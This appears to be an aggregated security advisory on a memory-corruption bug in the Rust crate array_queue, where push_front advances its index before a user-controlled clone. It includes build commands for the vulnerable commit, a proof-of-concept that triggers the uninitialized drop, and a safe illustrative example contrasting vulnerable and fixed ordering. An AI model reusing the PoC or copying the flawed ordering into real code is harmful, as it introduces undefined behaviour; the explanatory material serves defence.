The vulnerability is in the `push_front` method of `array_queue::ArrayQueue`. The method takes a value, clones it, and inserts the clone at the front of the queue. It first moves the internal `start` index back by one to reserve the slot, and only then clones the input value. That clone is user-controlled: if the caller's `Clone` implementation panics, `push_front` unwinds before the slot is written, and nothing restores the index. The queue is left in an inconsistent state in which `start` points to a slot that was reserved but never initialized. When the `ArrayQueue` is later dropped, its destructor walks every slot the indices claim is live and calls `drop` on each, including the reserved but uninitialized one. Dropping uninitialized memory is undefined behaviour, so a panic inside `clone()` can turn into memory corruption.
Platform: Rust crate
Version: array_queue
Vulnerability: Memory corruption
Severity: Critical
Date: 2021-03-17
Prediction: Patched 2021-03-17
What Undercode Says:
git clone https://github.com/etaoins/array_queue.git
cd array_queue
git checkout 728fe1b
cargo build
// Proof-of-concept triggering the vulnerability
// (Cargo.toml must depend on array_queue at the checked-out commit above)
use array_queue::ArrayQueue;

// User type whose Clone implementation panics; any panicking clone() will do.
struct PanicOnClone;

impl Clone for PanicOnClone {
    fn clone(&self) -> Self {
        panic!("Exploit triggered");
    }
}

fn main() {
    // Constructor and push_front call shapes are as given on this page;
    // adjust them to the crate's exact signatures at the checked-out commit.
    let mut queue = ArrayQueue::new(1);

    // push_front advances `start` first and clones second; the clone panics,
    // so the slot stays reserved but unwritten. catch_unwind keeps the process
    // alive so that the queue is still dropped normally afterwards.
    let _ = std::panic::catch_unwind(std::panic::AssertUnwindSafe(|| {
        queue.push_front(PanicOnClone);
    }));

    // queue is dropped here: Drop walks the reserved-but-uninitialized slot (UB)
}
How Exploit:
Supply an element type whose `Clone` implementation panics, call `push_front` with it inside `catch_unwind`, and let the queue go out of scope; the destructor then drops the reserved but never-initialized slot.
Protection from this vulnerability
Update to a version in which `push_front` clones the value before advancing `start` (or otherwise restores the indices when the clone unwinds), so a panicking `clone()` cannot leave a reserved slot uninitialized.
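To make the ordering problem concrete, here is an added example that is not code from the array_queue crate or from the proof-of-concept above. It is a small fixed-capacity ring queue whose slots are `Option<T>` (an assumption made so that the broken state is observable from safe code instead of being undefined behaviour). `push_front_vulnerable` mirrors the ordering described in the advisory (indices advanced, then the user-controlled clone), `push_front_fixed` clones before touching any state, and `probe` runs each variant under `catch_unwind` and reports the length the queue claims and whether every claimed slot actually holds a value. All names (`RingQueue`, `probe`, `invariants_hold`, `PanicOnClone`) are hypothetical.

```rust
use std::panic::{catch_unwind, AssertUnwindSafe};

/// Constructed fixed-capacity ring queue. `start` is the index of the first
/// live element and `len` the number of live elements; the invariant that
/// Drop would rely on is "every slot in [start, start+len) is live".
pub struct RingQueue<T> {
    slots: Vec<Option<T>>,
    start: usize,
    len: usize,
}

impl<T: Clone> RingQueue<T> {
    pub fn with_capacity(cap: usize) -> Self {
        RingQueue { slots: (0..cap).map(|_| None).collect(), start: 0, len: 0 }
    }

    pub fn len(&self) -> usize {
        self.len
    }

    fn cap(&self) -> usize {
        self.slots.len()
    }

    /// Index of the slot just before `i`, wrapping around the buffer.
    fn prev(&self, i: usize) -> usize {
        (i + self.cap() - 1) % self.cap()
    }

    /// Vulnerable ordering: bookkeeping is updated first, then the clone runs.
    /// If `clone()` unwinds, `start`/`len` already claim a slot that is empty.
    pub fn push_front_vulnerable(&mut self, value: &T) -> Result<(), &'static str> {
        if self.len == self.cap() {
            return Err("full");
        }
        self.start = self.prev(self.start);
        self.len += 1;
        self.slots[self.start] = Some(value.clone()); // may panic
        Ok(())
    }

    /// Hardened ordering: everything that can unwind happens before any state
    /// is mutated, so a panicking clone leaves the queue exactly as it was.
    pub fn push_front_fixed(&mut self, value: &T) -> Result<(), &'static str> {
        if self.len == self.cap() {
            return Err("full");
        }
        let cloned = value.clone(); // may panic; nothing has been touched yet
        let idx = self.prev(self.start);
        self.slots[idx] = Some(cloned);
        self.start = idx;
        self.len += 1;
        Ok(())
    }

    /// The check a destructor implicitly depends on: every claimed slot is live.
    pub fn invariants_hold(&self) -> bool {
        (0..self.len).all(|k| self.slots[(self.start + k) % self.cap()].is_some())
    }
}

/// Constructed element type standing in for a user type whose Clone panics.
pub struct PanicOnClone;

impl Clone for PanicOnClone {
    fn clone(&self) -> Self {
        panic!("clone failed")
    }
}

/// Runs one push_front variant under catch_unwind and returns
/// (claimed length, whether the invariant still holds) afterwards.
pub fn probe(use_fixed: bool) -> (usize, bool) {
    let mut q: RingQueue<PanicOnClone> = RingQueue::with_capacity(2);
    let outcome = catch_unwind(AssertUnwindSafe(|| {
        if use_fixed {
            q.push_front_fixed(&PanicOnClone)
        } else {
            q.push_front_vulnerable(&PanicOnClone)
        }
    }));
    assert!(outcome.is_err(), "clone() was expected to panic");
    (q.len(), q.invariants_hold())
}

fn main() {
    println!("vulnerable: {:?}", probe(false)); // (1, false): a claimed slot is empty
    println!("fixed:      {:?}", probe(true)); // (0, true): queue unchanged
}
```

With real uninitialized storage (`MaybeUninit<T>` instead of `Option<T>`) the `(1, false)` state is exactly what the destructor would walk, which is how a logic error in ordering becomes a drop of uninitialized memory. The rule the fix relies on is general: perform every operation that can unwind, here the user-controlled `clone()`, before mutating the structure's bookkeeping, or undo the bookkeeping with a drop guard if it must come first. For code that does use uninitialized storage, running the test suite under Miri (`cargo miri test`) is the practical way to catch such a drop instead of waiting for a crash.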
Impact:
Drop of an uninitialized slot in the queue's destructor: undefined behaviour that can lead to memory corruption or a crash, triggerable by any element type whose `clone()` panics.
Sources:
Reported By: github.com